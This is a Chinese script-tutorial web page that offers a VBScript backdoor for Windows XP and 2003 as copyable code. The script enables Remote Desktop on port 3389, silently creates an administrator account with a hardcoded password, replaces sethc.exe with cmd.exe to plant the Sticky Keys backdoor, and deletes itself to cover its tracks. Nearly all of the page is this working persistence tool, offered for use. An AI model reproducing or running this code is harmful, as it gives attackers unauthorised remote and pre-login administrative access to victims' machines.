当前位置: 首页 > 图文教程 > 脚本技术 > VBScript > xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

VBScript
Restart.vbs源代码可以重启远程电脑的vbs
远程或本地获取系统信息的脚本RGIS.vbs
远程开启/关闭目标telnet服务的windows脚本RTCS.vbs
可以得到当前系统信息的脚本sysinfo.vbs
RCMD使用说明
远程启动终端服务的windows脚本ROTS.vbs
解锁注册表的vbs脚本
如何使用脚本锁定任务栏?
灵活实用VBS入门教程应用篇
注册表-批处理-VBS之间的功能对应
收集的一些经典的vbs脚本大全
VBS+MSWinsock打造灵巧UDP后门的相关资料
一些经典的主要用户黑客的vbs脚本结合echo的dos下实现
可以定时自动关机的vbs脚本
利用wscript执行文件[包括可执行exe文件]vbs脚本
vbs实用软件自造——Windows脚本应用实例
防止网页脚本病毒执行的方法-from web
打开QQ并且让它自己输入用户名和密码的vbs脚本
多进程的实现投票的vbs脚本
用vbs脚本实现运行DOS批处理不再出现黑屏cmd窗口

VBScript 中的 xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-11   浏览: 72 ::
收藏到网摘: n/a

复制代码 代码如下:

on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
on error resume next
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)